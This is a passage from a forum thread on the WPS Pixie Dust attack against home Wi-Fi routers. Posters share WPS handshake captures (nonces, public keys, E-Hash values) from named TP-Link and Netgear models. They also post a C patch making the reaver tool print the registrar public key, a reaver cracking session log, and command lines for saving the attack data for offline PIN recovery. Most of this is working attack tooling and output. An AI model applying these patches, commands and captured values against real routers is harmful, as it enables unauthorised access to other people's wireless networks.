    PKR:28:bf:b7:94:77:e4:c2:9d:0e:f8:60:1e:d1:0f:22:2 4:50:b4:c9:06:26:86:62:ea:cb:6d:66:8e:92:ee:a2:8a: 0f:66:c2:72:cc:25:43:32:ee:d5:b6:37:02:f7:9f:9c:7d :5b:93:5b:b9:49:7b:1e:fd:20:87:5a:d8:ea:55:55:52:e 9:bc:56:0f:82:d2:61:fb:4f:e3:08:bd:10:52:36:8c:81: c9:e8:0b:97:c0:bd:10:30:72:cc:20:d2:31:6a:f2:8a:c0 :7c:a6:c2:8c:ae:43:0a:eb:0b:e0:13:76:40:91:ec:aa:5 5:46:83:f3:b3:c2:d8:1a:e5:20:16:a4:6c:68:d9:b0:68: e2:ef:35:74:d4:25:f3:a9:71:1c:19:e7:82:d3:c7:96:e7 :33:1d:97:20:5e:8c:58:71:ac:8f:33:3c:2a:d8:55:f6:7 4:51:1b:ff:e8:19:e0:8a:95:ad:53:03:40:a6:70:f7:22: b2:42:47:e3:1b:0d:28:64:a5:15

    Modell: TL-WR1043ND - TP-Link

    E-Nonce: 75:28:e8:1e:7e:9f:35:42:53:96:21:31:72:56:0d:12
    PKE: 5f:48:b9:03:9b:ca:ce:5e:f2:50:05:5f:a8:ed:84:5a:91 :39:ce:b8:3c:f9:c9:0b:14:67:2d:f5:8d:72:86:d7:41:d 5:b2:4e:41:fd:9e:a2:8d:a5:5a:c2:70:78:e7:83:ab:98: 49:c2:c1:0a:17:4f:e1:b3:58:ee:71:e1:b1:99:33:69:07 :1b:3a:96:b7:dd:a6:8b:31:ce:0d:8a:a1:1a:63:ee:5b:d 3:d9:d4:27:cb:95:e8:22:ac:89:f1:d3:ba:cc:f2:8c:0d: 18:1b:e3:d9:77:df:bb:cf:dd:1e:13:81:26:b1:b3:4a:8c :85:06:40:17:29:04:04:d2:d2:5b:41:12:62:de:2d:ed:5 c:94:81:c0:21:18:c1:f6:5e:5c:9e:71:e5:66:44:12:fb: da:38:56:de:ec:c7:58:36:93:ee:b5:b0:72:5c:68:c1:81 :c1:8f:b0:c9:41:9f:d1:0a:72:92:56:d9:af:c5:d3:e4:7 8:b9:e7:91:66:d9:7e:8b:fb
    PKR:
    5f:45:13:03:8f:b9:52:a0:d4:6b:bf:5e:c2:54:7a:9f:1d :d8:47:19:ca:0f:47:71:3a:c4:ce:18:6c:1e:91:0f:2e:c 3:c1:60:1a:91:41:09:49:98:c1:d3:65:ab:15:21:39:1d: 69:bd:1a:5a:7e:ad:fb:f7:a7:c2:bb:65:3d:62:2e:02:fb :ea:31:23:4e:18:e4:77:24:da:6c:92:d6:d2:f0:ef:7a:4 e:6c:3e:df:c4:c5:57:a6:67:93:6b:38:15:7e:05:77:fa: f9:b4:35:06:5f:b5:6c:5a:0f:36:e0:6a:79:4b:e2:65:1b :03:cc:22:10:80:83:90:59:f4:ae:1f:41:f8:e4:ef:d3:0 1:f6:ad:17:b2:6d:04:51:57:53:3d:55:78:c4:69:50:3c: 11:db:e1:d2:f2:0f:9b:23:9c:81:2f:27:c6:bd:b8:3f:8d :b5:e7:5f:4f:63:3a:85:72:24:43:48:63:1e:95:08:c1:4 4:66:9a:11:43:6a:03:45:a4
    AuthKey: 75:bf:65:6f:e9:51:a9:f9:6c:8a:ec:fa:1a:96:6b:52:19 :4c:22:6c:e5:e3:5c:c8:72:b9:bc:78:45:ba:e4:f8
    E-Hash1: a0:34:b8:48:57:38:23:ea:8a:29:b7:c9:15:b3:8f:c8:52 :87:2f:08:7e:c9:57:e8:52:04:b5:f6:18:2d:71:4c
    E-Hash2: b5:99:8a:6d:85:4b:63:e7:91:af:5b:be:4a:19:7e:eb:e7 :9c:04:3d:7c:6a:c2:2d:56:66:4b:f1:6a:47:a4:17

    Modell: TL-WR1043 - TP-Link

    E-Nonce: d4:1c:7d:7f:a7:9d:31:9f:a2:16:fb:4e:e2:6f:a2:80
    PKE:5c:08:ff:c8:9f:3b:96:1d:9d:89:28:5a:9d:bf:8d:0 6:12:f6:a1:5f:01:7e:e0:34:e8:b0:d8:d8:c4:ff:be:00: c4:81:50:03:1b:a2:ac:b4:22:e2:49:71:fa:ff:01:2c:74 :62:4e:15:ad:4c:40:7d:1a:6a:af:f9:63:4f:f0:6d:f1:1 b:56:7f:47:15:94:8b:28:80:a2:dd:0a:28:a3:46:05:57: 5f:16:cd:e7:25:b7:50:e6:f9:f4:00:e8:35:6d:c4:15:82 :c2:2a:4d:8b:e2:63:2d:a1:cb:db:cd:c6:3e:8a:60:12:2 e:a8:53:96:0c:ca:8c:82:5e:42:f9:aa:db:4f:f0:de:8a: 37:5c:0d:b5:4f:7d:bb:47:a9:62:58:3d:db:31:e4:be:68 :39:5a:92:f9:75:9b:e6:50:ae:27:df:87:83:62:42:f1:1 3:3a:d5:a7:66:8c:cb:3c:9f:12:1d:76:0b:6d:eb:a5:84: 73:8a:60:33:19:ac:2a:74:2c:f8
    AuthKey: 2f:0c:46:3c:ad:a0:35:b5:83:ab:02:9e:b7:ec:91:47:e4 :00:d9:ee:60:4d:40:49:76:92:eb:9f:1a:e3:84:cb
    E-Hash1: 3c:72:7a:a4:9e:42:30:e2:81:1a:04:ef:e7:40:fd:de:f3 :b7:eb:0a:82:ad:0e:82:9d:b8:3f:a8:d0:d9:b5:06
    E-Hash2: a4:cb:f4:96:31:fc:1f:2a:7e:7a:b2:6b:b3:1b:aa:2a:0a :87:d2:54:60:07:1b:4b:0e:d7:7a:f2:c6:a4:fc:7e
    PKR:da:ab:2e:3f:67:b2:0c:e6:69:9f:13:68:e6:3a:78:c 5:c8:d7:ab:60:0f:1c:57:5f:e4:bd:b0:76:0d:a7:20:3f: 0a:b4:9f:2e:80:99:fa:06:fa:46:03:03:ea:7c:d4:fa:f8 :a6:ca:cc:74:e9:18:f7:f2:54:d2:e9:10:71:2f:5a:b6:7 1:df:1f:dc:d2:67:c8:19:45:41:d9:f7:a1:fc:e8:95:0c: 92:cd:59:4e:ae:5d:68:98:b3:8d:82:dc:ca:cc:ca:b8:79 :35:fa:a4:e0:5d:85:13:31:a2:ea:99:8d:bd:82:2c:b4:7 a:35:92:1a:84:c7:99:e8:0f:96:69:d0:14:5e:dc:31:09: 3b:a3:da:65:56:54:ad:4a:d3:1a:9e:e4:98:17:98:d4:29 :c0:8b:7c:75:30:b7:c8:fe:4a:65:5c:38:5b:1c:71:2e:3 5:a2:de:07:52:2e:6f:01:e0:1a:60:e6:b8:22:92:ca:62: cf:a7:4e:6a:46:62:43:48:f0:42
    [B]

    Modell: WNR2000v4 - Netgear
    Chip:Atheros AR9341


    E-Nonce: 99:a2:d2:0d:f9:9d:f8:35:da:4b:a7:6d:6a:01:85:23
    PKE:ac:e6:d0:a0:d3:17:7b:b0:d0:69:bc:37:23:d9:1a:2 e:dc:cb:8d:e7:de:fe:22:89:04:1e:34:5d:1d:f9:5a:25: b4:15:0f:43:c3:b2:22:97:4c:b6:8f:ec:9d:31:91:0a:76 :bc:20:98:d6:22:db:71:dc:82:6d:df:8c:19:12:6d:ad:0 f:3a:88:54:83:68:97:ae:27:18:39:84:f5:46:15:4f:f7: 38:20:60:80:56:42:76:48:d6:d3:b8:79:88:56:ca:4d:d5 :29:1a:47:1c:78:0d:31:fb:aa:23:fb:03:ee:cf:be:77:b f:2e:7d:f2:06:2d:11:f9:47:20:97:08:79:c3:47:1c:13: 58:cd:35:a1:76:a3:eb:71:14:c4:7e:39:7a:e5:15:95:b1 :fa:40:7d:b0:e2:e4:8a:af:eb:de:67:5e:c6:05:0d:3d:1 3:9d:9c:49:c4:46:a1:92:60:d7:27:a4:e2:b1:6d:52:79: da:29:c7:45:93:13:0b:e4:28:b5
    AuthKey: b8:e6:b4:e6:73:e1:92:32:e1:87:11:d6:0c:10:0e:3f:05 :d4:b8:6c:0d:53:b8:50:c5:3f:d2:95:1f:6a:ab:98
    E-Hash1: 6b:f2:06:6b:dd:ce:f7:4c:42:df:62:d8:60:3b:3b:2d:b9 :da:8e:da:d6:f5:df:b4:a7:2f:a2:c6:bd:61:61:87
    E-Hash2: d7:e2:ce:c5:2f:0d:b4:8e:f3:a6:19:ee:38:d7:19:55:1a :ef:3a:7f:ab:93:e5:0c:df:fe:cf:bb:f1:ab:06:74

  42. #192
    Is this helpful?

    Code:
    diff --git a/src/crypto/dh_groups.c b/src/crypto/dh_groups.c
    --- a/src/crypto/dh_groups.c
    +++ b/src/crypto/dh_groups.c
    @@ -605,6 +605,17 @@ struct wpabuf * dh_init(const struct dh_
        wpabuf_put(pv, pv_len);
        wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);
    
    +    printf("[P] PKR: ");
    +    int pixiecnt = 0;
    +   const u8 *pkr = wpabuf_head_u8(pv);
    +    for (; pixiecnt < 192; pixiecnt++) {
    +        printf("%02x", pkr[pixiecnt]);
    +        if (pixiecnt != 191) {
    +            printf(":");
    +        }
    +    }
    +    printf("\n");
    +
        return pv;
     }

  43. #193
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    @someone_else Thanks for all the data! I've added it

  44. #194
    Join Date
    2014-Oct
    Posts
    42
    Quote Originally Posted by t6_x View Post
    This is a example

    [+] Switching mon0 to channel 9
    [?] Restore previous session for 64:70:02:535:FA? [n/Y] n
    [+] Waiting for beacon from 64:70:02:535:FA
    [+] Associated with 64:70:02:535:FA (ESSID: t6)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: d7:5b:a5:c1:be:a9:23:da:......
    [P] PKE: d5:2e:5f:2e:58:ee:d0:3e:f2:d0:18:bc:a2:c9:be:da:91 :6e:b5:81:0f:5a:ee:30:0f:7b:00:ea:bf:86:73:86:b8:f f:24:f7:........
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [+] Received M1 message
    [P] PKR: 01:38:b1:f2:38:52:5f:cc:8a:e5:0e:00:30:5f:15:b2:e3 :88:86:68:1c:c1:b4:6d:a9:80:45:dd:c8:cd:07:8a:a1:1 8:45:.......
    [+] Sending M2 message
    [P] E-Hash1: ee:a0:46:ba:b1:e3:80:29:cd:80:0b:b2:e2:..........
    [P] E-Hash2: 59:43:8b:93:7a:79:b1:d9:ef:7a:d6:b0:50:.....
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    Hi t6_x, would it be possible for you to post this version of reaver?

  45. #195
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I'll upload the new reaver tomorrow when I get a chance

  46. #196
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Espresso_Boy View Post
    Is this helpful?

    Code:
    diff --git a/src/crypto/dh_groups.c b/src/crypto/dh_groups.c
    --- a/src/crypto/dh_groups.c
    +++ b/src/crypto/dh_groups.c
    @@ -605,6 +605,17 @@ struct wpabuf * dh_init(const struct dh_
        wpabuf_put(pv, pv_len);
        wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);
    
    +    printf("[P] PKR: ");
    +    int pixiecnt = 0;
    +   const u8 *pkr = wpabuf_head_u8(pv);
    +    for (; pixiecnt < 192; pixiecnt++) {
    +        printf("%02x", pkr[pixiecnt]);
    +        if (pixiecnt != 191) {
    +            printf(":");
    +        }
    +    }
    +    printf("\n");
    +
        return pv;
     }
    Yeah that's what we've been looking for! Thanks!

  47. #197
    Join Date
    2014-Oct
    Posts
    42
    Quote Originally Posted by soxrok2212 View Post
    I'll upload the new reaver tomorrow when I get a chance
    Thank you very much soxrok2212.

  48. #198
    Join Date
    2015-Mar
    Posts
    127
    New reaver and pixiewps, good times

  49. #199
    Join Date
    2013-Jul
    Posts
    841
    For the modded reaver for pixiedust

    You can separate out the pixiedust data and write directly to a file as follows:

    If you include the -o <filename> command in the reaver command line:

    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -o pixietest01

    reaver will write to file all data not preceeded with [P] to pixietest01

    reaver will write data proceeded with [P] to screen not to file


    The data proceeded by [P] though is the data required for a pixiedust attack.

    Therefore:

    To write only pixiedust data to a file use the following:

    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -o pixietest01 | tee pixiedust02

    In this case:

    Non pixiedust data will be written to pixiedust01

    Pixiedust data only will be written to both screen and the file pixiedust02


    Musket Teams
    Last edited by mmusket33; 2015-04-12 at 10:57.

  50. #200
    Join Date
    2013-Jul
    Posts
    841
    To soxrox2212

    MTeams modded the /src/crypto/dh_groups.c file as suggested by Espresso above .

    We reinstalled reaver and ran tests.

    The --pkr variable is the provided thru reaver along with the --pke etc

    The mod is inserted below line 606

    Line 606 = wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);


    wpabuf_put(pv, pv_len);
    wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);

    /******** ADD THIS PART ******/

    printf("[P] PKR: ");
    int pixiecnt = 0;
    const u8 *pkr = wpabuf_head_u8(pv);
    for (; pixiecnt < 192; pixiecnt++) {
    printf("%02x", pkr[pixiecnt]);
    if (pixiecnt != 191) {
    printf(":");
    }
    }
    printf("\n");

    /*** END ADD THIS PART END ***/

    return pv;
    }



    We will send you an automated script soon. We are currently using it, but the addition of a --pkr variable provided by reaver has caused us to have to add this choice into the menu so there will be a delay.

    MTeams

Similar Threads

  1. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  2. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32
  3. Implement new WPS Pixie Dust Attack into Reaver
    By six in forum General Archive
    Replies: 24
    Last Post: 2015-01-28, 20:31

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •